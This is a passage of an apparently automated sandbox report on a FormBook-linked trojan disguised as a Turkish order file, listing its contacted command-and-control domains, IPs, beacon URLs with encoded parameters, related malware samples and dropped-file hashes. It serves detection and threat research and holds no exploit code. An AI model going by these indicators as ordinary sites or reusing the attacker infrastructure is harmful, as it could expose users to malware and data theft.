http://www.evertudy.xyz/csr7/?iJiX_=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dBRmaO8GFftFICNQKrDMfpUc2J19e4FsCw3tJmkJ0eBlHLQ==&eZ=3HYLM	0%	Avira URL Cloud	safe
http://www.dennisrosenberg.studio/gvk0/?eZ=3HYLM&iJiX_=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PYRv9+O/t9WvMGJPSRuXiPeF8kiiDoShqgPK5SBbSxKLjpw==	0%	Avira URL Cloud	safe
http://www.dennisrosenberg.studio/gvk0/	0%	Avira URL Cloud	safe
http://www.thesprinklesontop.com/n12h/	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mocar.pro	109.95.158.122	true	true	1%, Virustotal, Browse	unknown
www.highwavesmarine.com	23.111.180.146	true	true	0%, Virustotal, Browse	unknown
www.thesprinklesontop.com	208.91.197.27	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	0%, Virustotal, Browse	unknown
www.ennerdaledevcons.co.uk	212.227.172.254	true	true	1%, Virustotal, Browse	unknown
dxgsf.shop	103.197.25.241	true	true	2%, Virustotal, Browse	unknown
stefanogaus.com	66.235.200.146	true	true	1%, Virustotal, Browse	unknown
www.luo918.com	35.227.248.111	true	false	0%, Virustotal, Browse	unknown
xiaoyue.zhuangkou.com	47.239.13.172	true	true	0%, Virustotal, Browse	unknown
www.evertudy.xyz	203.161.49.220	true	true	2%, Virustotal, Browse	unknown
www.fungusbus.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.newzionocala.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
56.126.166.20.in-addr.arpa	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.dennisrosenberg.studio	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.shoplifestylebrand.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.qe1jqiste.sbs	unknown	unknown	true		unknown
www.mocar.pro	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.dxgsf.shop	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.neworldelectronic.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.stefanogaus.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.artemhypnotherapy.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.todosneaker.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.evertudy.xyz/csr7/	true	Avira URL Cloud: safe	unknown
http://www.qe1jqiste.sbs/2dv8/	true	Avira URL Cloud: safe	unknown
http://www.fungusbus.com/dmjt/?iJiX_=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnEtY8cBV1InP23K1rvoSk7X1+smLn8qttMRFZOf+8GJ/nwg==&eZ=3HYLM	true	Avira URL Cloud: safe	unknown
http://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfZlnLf1iW05ccEvRvL6OrWq1JPJo5l6rk1ZbisRWcHyTHqg==	true	Avira URL Cloud: safe	unknown
http://www.luo918.com/qmv1/?eZ=3HYLM&iJiX_=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7duzMF8qcwSy0or9MU4FAt6yJL5XTwcCyhmcdeorymiKmWQ==	false	Avira URL Cloud: safe	unknown
http://www.artemhypnotherapy.com/9285/	true	Avira URL Cloud: safe	unknown
http://www.mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBew+mwyIGh8NWq3ehH5OgTP/98tgqTRgcUpqrv79RN6be7A==	true	Avira URL Cloud: safe	unknown
http://www.luo918.com/qmv1/	false	Avira URL Cloud: safe	unknown
http://www.dxgsf.shop/vfca/?iJiX_=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJyCFsntjSnqpwzP+jY6yNjY7ViduojwQX6Un4yLfzesgT7A==&eZ=3HYLM	true	Avira URL Cloud: safe	unknown
http://www.stefanogaus.com/0rsk/	true	Avira URL Cloud: safe	unknown
http://www.dxgsf.shop/vfca/	true	Avira URL Cloud: safe	unknown
http://www.mocar.pro/prg5/	true	Avira URL Cloud: safe	unknown
http://www.qe1jqiste.sbs/2dv8/?iJiX_=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX29b0eHgxHefEnuc0ogV2nM4gi2K3554lDMjGRktsI1JKBOA==&eZ=3HYLM	true	Avira URL Cloud: safe	unknown
http://www.thesprinklesontop.com/n12h/?eZ=3HYLM&iJiX_=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNiQ0n2zDakMpJnzyHioqcCYotdW6+iH3FtmEZOQT5Ykxdbw==	true	Avira URL Cloud: safe	unknown
http://www.highwavesmarine.com/vpfr/?eZ=3HYLM&iJiX_=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQp0lsgtKVk15wNPoNEOoMMjyN3LU6dxhHI1FgmxIsamdstg==	true	Avira URL Cloud: safe	unknown
http://www.ennerdaledevcons.co.uk/4ksh/	true	Avira URL Cloud: safe	unknown
http://www.fungusbus.com/dmjt/	true	Avira URL Cloud: safe	unknown
http://www.thesprinklesontop.com/n12h/	true	Avira URL Cloud: safe	unknown
http://www.evertudy.xyz/csr7/?iJiX_=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dBRmaO8GFftFICNQKrDMfpUc2J19e4FsCw3tJmkJ0eBlHLQ==&eZ=3HYLM	true	Avira URL Cloud: safe	unknown
http://www.dennisrosenberg.studio/gvk0/	true	Avira URL Cloud: safe	unknown
http://www.dennisrosenberg.studio/gvk0/?eZ=3HYLM&iJiX_=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PYRv9+O/t9WvMGJPSRuXiPeF8kiiDoShqgPK5SBbSxKLjpw==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.namecheap.com/domains/registration/results/?domain=fungusbus.com	unregmp2.exe, 00000007.00000002.3849243854.000000000605A000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thesprinklesontop.com/sk-logabpstatus.php?a=a1hVY3BFSVExenNSTmVHYmpRNUdGNXVZNnlIbGdzZTQ2N	unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1	unregmp2.exe, 00000007.00000002.3849243854.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003C64000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thesprinklesontop.com/px.js?ch=1	unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thesprinklesontop.com/px.js?ch=2	unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zE	unregmp2.exe, 00000007.00000002.3849243854.000000000555C000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000361C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hm.baidu.com/hm.js?	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.stefanogaus.com	UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3851020084.0000000005082000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.sedoparking.com/templates/images/hero_nc.svg	unregmp2.exe, 00000007.00000002.3849243854.000000000605A000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1404111165.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
35.227.248.111	www.luo918.com	United States	15169	GOOGLEUS	false
66.235.200.146	stefanogaus.com	United States	13335	CLOUDFLARENETUS	true
23.111.180.146	www.highwavesmarine.com	United States	29802	HVC-ASUS	true
103.197.25.241	dxgsf.shop	Hong Kong	55933	CLOUDIE-AS-APCloudieLimitedHK	true
208.91.197.27	www.thesprinklesontop.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
109.95.158.122	mocar.pro	Poland	48896	DHOSTING-ASWarsawPolandPL	true
203.161.49.220	www.evertudy.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
47.239.13.172	xiaoyue.zhuangkou.com	United States	20115	CHARTER-20115US	true
212.227.172.254	www.ennerdaledevcons.co.uk	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466644
Start date and time:	2024-07-03 08:32:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/7@17/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 95 Number of non-executed functions: 287
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:33:05	API Interceptor	1x Sleep call for process: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe modified
02:33:07	API Interceptor	11x Sleep call for process: powershell.exe modified
02:34:03	API Interceptor	11609614x Sleep call for process: unregmp2.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.235.200.146	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.stefanogaus.com/0rsk/?T0Ety=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&DTP=bh68NN
	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	www.snugandkind.com/vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z
	GQVUENt6FZ.exe	Get hash	malicious	FormBook	Browse	www.nooklanding.com/duv2/
	Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.worshipgrounds.com/u68o/?vTcP727h=mL9XaWxGsgpWZqmrS8Ok6Xw9UrbNySSt92uYUQ8LAIyJS7HyfVV5UqrkOL/xCfMhDfOsMhBePBa1xORiQKfo4FaZOye7fgphA2gE27sjCtrRq8XCKw==&pV=jnzt
	BL copy.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nooklanding.com/duv2/
23.111.180.146	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.highwavesmarine.com/vpfr/?DTP=bh68NN&T0Ety=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA==
103.197.25.241	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/vfca/
	SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.dxgsf.shop/e368/
	inquiry.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/e368/
	purchase order 8MCE15.scr.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/e368/
	SecuriteInfo.com.Heur.21813.17790.exe	Get hash	malicious	FormBook	Browse	www.dxgsf.shop/e368/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.thesprinklesontop.com	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
parkingpage.namecheap.com	Att00173994.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	disjR92Xrrnc3aZ.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Attendance list.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Att0027592.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	#U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	1R50C5E13BU8I.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	91.195.240.19
www.ennerdaledevcons.co.uk	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	212.227.172.254
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	212.227.172.254
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	212.227.172.254
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	212.227.172.254
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	212.227.172.254
www.highwavesmarine.com	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HVC-ASUS	https://www.dgccollectors.com/doc.php	Get hash	malicious	Unknown	Browse	199.167.144.130
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	2024 Benefits_Revised_Agreement_83190_mgarrison_Signature_Required.pdf	Get hash	malicious	Unknown	Browse	162.252.172.232
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	PXJpJX4mUp.exe	Get hash	malicious	Unknown	Browse	162.252.172.67
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	KURUMSAL KRED#U0130 #U00d6DEME HATIRLATMA.exe	Get hash	malicious	FormBook	Browse	23.111.180.146
	http://promooformosa.com	Get hash	malicious	Unknown	Browse	23.227.203.57
CLOUDFLARENETUS	AWB 3609 961.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Att00173994.exe	Get hash	malicious	FormBook	Browse	104.21.92.152
	aAEsSBx24sxHhRz.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	MT_0615_60931PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	IMG_0178520003023PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	MT_01452_03607PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	Doc230906103882.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	fin.746.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	JuHVfiAuLo.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	172.67.221.174
	LXbM8RbhLa.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	104.21.45.251
CLOUDIE-AS-APCloudieLimitedHK	BviOG97ArX.elf	Get hash	malicious	Mirai, Moobot	Browse	102.129.161.100
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	103.197.25.241
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	103.197.25.241
	KALIANDRA SETYATAMA PO 1310098007.exe	Get hash	malicious	FormBook	Browse	103.197.25.241
	http://telegravm.work/	Get hash	malicious	Telegram Phisher	Browse	103.119.3.186
	http://telegrart.work/	Get hash	malicious	Unknown	Browse	103.140.126.137
	http://telegrarl.work/	Get hash	malicious	Telegram Phisher	Browse	103.140.126.137
	http://telegraem.work/	Get hash	malicious	Telegram Phisher	Browse	103.140.126.137
	http://telegrram.work/	Get hash	malicious	Telegram Phisher	Browse	103.140.127.200
	http://telegrmaw.work/	Get hash	malicious	Telegram Phisher	Browse	103.119.3.186

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.log

Download File

Process:	C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
